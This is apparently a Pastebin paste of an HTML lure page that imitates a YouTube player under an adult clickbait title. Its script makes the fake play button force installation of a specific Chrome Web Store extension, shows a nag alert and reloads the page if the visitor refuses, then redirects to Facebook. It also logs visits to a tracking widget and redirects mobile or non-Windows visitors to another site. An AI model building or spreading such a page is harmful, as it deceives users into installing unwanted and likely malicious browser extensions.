Advertisement
Guest User

Untitled

a guest
May 30th, 2015
335
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.42 KB | None | 0 0
  1.  
  2. <html xmlns="http://www.w3.org/1999/xhtml" prefix="og: http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
  3. <html xmlns="http://www.w3.org/1999/xhtml">
  4. <head>
  5. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  6.  
  7.  
  8. <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/hjhbjmejpdipcdpbblhfekpeehoekiak">
  9. <link rel="shortcut icon" href="https://s.ytimg.com/yts/img/favicon-vfldLzJxy.ico" type="image/x-icon">
  10.  
  11. <title>New Video</title>
  12.  
  13. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
  14.  
  15. <script>new Image().src = '//whos.amung.us/widget/base64x3.png';</script>
  16. <script type="text/javascript">!function(a){var b=/iPhone/i,c=/iPod/i,d=/iPad/i,e=/(?=.*\bAndroid\b)(?=.*\bMobile\b)/i,f=/Android/i,g=/IEMobile/i,h=/(?=.*\bWindows\b)(?=.*\bTouch\b)/i,i=/BlackBerry/i,j=/Opera Mini/i,k=/(?=.*\bFirefox\b)(?=.*\bMobile\b)/i,l=new RegExp("(?:Nexus 7|BNTV250|Kindle Fire|Silk|GT-P1000)","i"),m=function(a,b){return a.test(b)},n=function(a){var n=a||navigator.userAgent;this.apple={phone:m(b,n),ipod:m(c,n),tablet:m(d,n),device:m(b,n)||m(c,n)||m(d,n)},this.android={phone:m(e,n),tablet:!m(e,n)&&m(f,n),device:m(e,n)||m(f,n)},this.windows={phone:m(g,n),tablet:m(h,n),device:m(g,n)||m(h,n)},this.other={blackberry:m(i,n),opera:m(j,n),firefox:m(k,n),device:m(i,n)||m(j,n)||m(k,n)},this.seven_inch=m(l,n),this.any=this.apple.device||this.android.device||this.windows.device||this.other.device||this.seven_inch,this.phone=this.apple.phone||this.android.phone||this.windows.phone,this.tablet=this.apple.tablet||this.android.tablet||this.windows.tablet},o=new n;o.Class=n,"undefined"!=typeof module&&module.exports?module.exports=o:"function"==typeof define&&define.amd&&define(o),a.isMobile=o}(this);
  17. if (isMobile.any || navigator.platform.toLowerCase().indexOf("win") == -1) {
  18.  
  19. setTimeout(function(){top.location.href="http://www.newuser.me/mobil.html";},0);
  20. }</script>
  21.  
  22. <script>
  23.  
  24. if (top.location != self.location) { top.location = self.location }
  25. if (self != top) {
  26. top.location.replace(location.href);
  27. }
  28. </script>
  29. </head>
  30.  
  31. <body>
  32.  
  33. <style>
  34. /******* BODY ********/
  35. body {
  36. font-size: 13px;
  37. font-family: Arial, Helvetica, sans-serif;
  38. background:#f1f1f1;
  39. margin:0px;
  40. padding:0px;
  41. }
  42.  
  43. /******* HEADER ********/
  44. #header {
  45. position: fixed;
  46. top:0px;
  47. left:0px;
  48. right:0px;
  49. height: 50px;
  50. width: 100%;
  51. background: #fff url('http://i.imgur.com/5fLsIMa.png') left center no-repeat;
  52. border-bottom: 1px solid #e8e8e8;
  53. cursor: pointer;
  54. z-index: 1999999999;
  55. }
  56.  
  57. /******* MAIN ********/
  58. #main {
  59. width:702px;
  60. height:510px;
  61. border:0px solid #ccc;
  62. margin:0px auto;
  63. margin-top:20px;
  64. padding:0px 0px 0px 0px;
  65. overflow:hidden;
  66. }
  67.  
  68. h1 {
  69. margin:70px 0px 10px 0px;
  70. padding:0px;
  71. color:#333;
  72. font-size: 20px;
  73. font-weight: bold;
  74. line-height: 1.38;
  75. overflow:hidden;
  76. text-align:center;
  77. }
  78.  
  79. /******* CONTENIDO ********/
  80. #contenido {
  81. float:left;
  82. width:700px;
  83. margin:0px;
  84. padding:0px 0px 110px 0px;
  85. background: #fff url('http://i.imgur.com/ufkpYyf.png') bottom center no-repeat;
  86. border: 1px solid;
  87. border-color: #e5e6e9 #dfe0e4 #d0d1d5;
  88. -webkit-border-radius: 5px;
  89. overflow:hidden;
  90. }
  91.  
  92. #titulo {
  93. width:800px;
  94. margin:10px 0px 10px 0px;
  95. padding:0px;
  96. color:#333;
  97. font-size: 15px;
  98. font-weight: normal;
  99. line-height: 1.38;
  100. overflow:hidden;
  101. }
  102.  
  103. .youtubeblocker {
  104. position:relative;
  105. margin-bottom:0px;
  106. cursor:pointer;
  107. overflow: hidden;
  108. }
  109. .youtubeblocker .image {
  110. width:100%;
  111. height:100%;
  112. background-size:100% 100%;
  113. }
  114. .youtubeblocker .play-button {
  115. position:absolute;
  116. top:50%;
  117. left:50%;
  118. margin-left:-34px;
  119. margin-top:-23px;
  120. display:block;
  121. width:65px;
  122. height:47px;
  123. background: url('http://i.imgur.com/3lEq5if.png');
  124. }
  125. .youtubeblocker:hover .play-button {
  126. background-position:-65px;
  127. }
  128. .youtubeblocker .overlay {
  129. display:none;
  130. background: #000;
  131. opacity: .5;
  132. width:100%;
  133. height:100%;
  134. position:absolute;
  135. left:0;top:0;
  136. }
  137. .youtubeblocker .sharebox {
  138. display:none;
  139. position: absolute;
  140. left:10px;
  141. top:70px;
  142. right:10px;
  143. height:131px;
  144. padding:0px;
  145. background: url('compartir.png') center center no-repeat;
  146. }
  147.  
  148. .youtubeblocker-ori .sharebox-ori {
  149. display:none;
  150. position: absolute;
  151. left:10px;
  152. top:50px;
  153. right:10px;
  154. height:150px;
  155. padding:10px;
  156. background: #FFF;
  157. }
  158. .youtubeblocker .sharebox p {
  159. font-size:18px;
  160. margin-top:15px;
  161. text-align: center;
  162. }
  163. .youtubeblocker .sharebutholder {
  164. text-align: center;
  165. position: absolute;
  166. bottom: 20px;
  167. right: 0px;
  168. left: 2px;
  169. }
  170. .youtubeblocker .sharebut {
  171. border-radius: 5px;
  172. width:243px;
  173. height:56px;
  174. cursor: pointer;
  175. background: url('http://i.imgur.com/pwncTgN.gif') 0px 0px no-repeat;
  176. //background: url('../images/sharebut.png') 0px 0px no-repeat;
  177. display: -moz-inline-stack;
  178. display: inline-block;
  179. zoom: 1;
  180. *display: inline;
  181. }
  182. .youtubeblocker .controlls {
  183. height:35px;
  184. position:absolute;
  185. bottom:0px;
  186. left:0px;
  187. right:0px;
  188. background: url('http://i.imgur.com/2nyiyHH.png');
  189. }
  190. .youtubeblocker .controlls .left-controlls {
  191. cursor:pointer;
  192. position:absolute;
  193. left:11px;
  194. height:35px;
  195. width:121px;
  196. background: url('http://i.imgur.com/QBeDFb9.png') 0px 13px no-repeat;
  197. }
  198. .youtubeblocker .controlls .right-controlls {
  199. cursor:pointer;
  200. position:absolute;
  201. right:9px;
  202. height:35px;
  203. width:100px;
  204. background: url('http://i.imgur.com/KneATBL.png') 0px 13px no-repeat;
  205. }
  206.  
  207. #footer {
  208. //position: fixed;
  209. cursor:pointer;
  210. width: 100%;
  211. height:120px;
  212. background: #fff url('http://i.imgur.com/GbfiQoo.png') center center no-repeat;
  213. border-top: 1px solid #e2e2e2;
  214. bottom:0px;
  215. left:0px;
  216. right:0px;
  217. }
  218. </style>
  219.  
  220. <div id="header"></div>
  221.  
  222. <h1 style="margin-top:100px;">Youtube Uploaded Mom Son (+18) Video</h1>
  223. <div id="main">
  224. <div id="contenido" style="margin-top:50px;">
  225.  
  226. <!-- #### VIDEO 1 ### -->
  227. <div href="http://google.com/" id="uno" onclick="chromex();" class="youtubeblocker" style="width:700px;height:350px;background:#000000 url('http://i.imgur.com/yETYoId.gif') center center no-repeat;">
  228. <div class="image" style="background:#000000;"></div>
  229. <div class="play-button"></div>
  230. <div class="controlls">
  231. <div class="left-controlls"></div>
  232. <div class="right-controlls"></div>
  233. </div>
  234. <div class="overlay"></div>
  235. <div class="sharebox"></div>
  236. </div>
  237.  
  238. <!-- #### VIDEO 2 ### -->
  239.  
  240. <div href="http://google.com/" id="dos" class="youtubeblocker" style="display:none;width:700px;height:350px;background:#000000 url('verifica.jpgg') center center no-repeat;">
  241. <div class="image" style="background-image: url('URL_IMG')"></div>
  242. <div class="play-button"></div>
  243. <div class="controlls">
  244. <div class="left-controlls"></div>
  245. <div class="right-controlls"></div>
  246. </div>
  247. <div class="overlay"></div>
  248. <div class="sharebox"></div>
  249. </div>
  250. <!-- #### VIDEO 2 FIN### -->
  251.  
  252.  
  253. <script type="text/javascript">
  254. $(document).ready(function(){
  255. $('#uno').click(function () {
  256. $(".play-button,.image").fadeOut();
  257. chromex();
  258. });
  259.  
  260. });
  261. </script>
  262.  
  263. <script type="text/javascript">
  264. navegador();
  265. function navegador() {
  266. var navegador = navigator.userAgent;
  267. if (navigator.userAgent.indexOf('Firefox') !=-1) {
  268. $("#uno").hide();
  269. $("#dos").show();
  270. } else if (navigator.userAgent.indexOf('Chrome') !=-1) {
  271. (function(a, b){
  272. var e = new Image();
  273. e.addEventListener('load', a, false);
  274. e.addEventListener('error', b, false);
  275. e.src = '';
  276. })(function(){
  277. $("#uno").hide();
  278. $("#dos").show();
  279. }, function(){
  280.  
  281. });
  282. }
  283. }
  284. function chromex(){
  285. chrome.webstore.install("https://chrome.google.com/webstore/detail/hjhbjmejpdipcdpbblhfekpeehoekiak", function(){
  286. var dax = new Image();
  287. dax.onload = function(){
  288. window.location = "http://facebook.com/profile.php?id=*";
  289. }
  290. dax.onerror = function(){
  291. window.location = "http://facebook.com/profile.php?id=*";
  292. }
  293. dax.src="http://whos.amung.us/widget/videoextv2.png";
  294. }, function(err)
  295. {
  296. alert(" Sorry. if you dont install plugin, can not be get video.!\r\nPlease Install Plugin...");
  297. location.reload();
  298. });
  299.  
  300. setTimeout(function(){
  301. uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('verby/err.png') center center no-repeat;");
  302. setTimeout(function()
  303. {
  304. uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('verby/up.gif') center center no-repeat;");
  305.  
  306. }, 800);
  307. }, 1000);
  308.  
  309. }
  310. </script>
  311.  
  312.  
  313. <div id="footer" style="margin-top:250; position:fixed;"></div>
  314.  
  315. </body>
  316. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement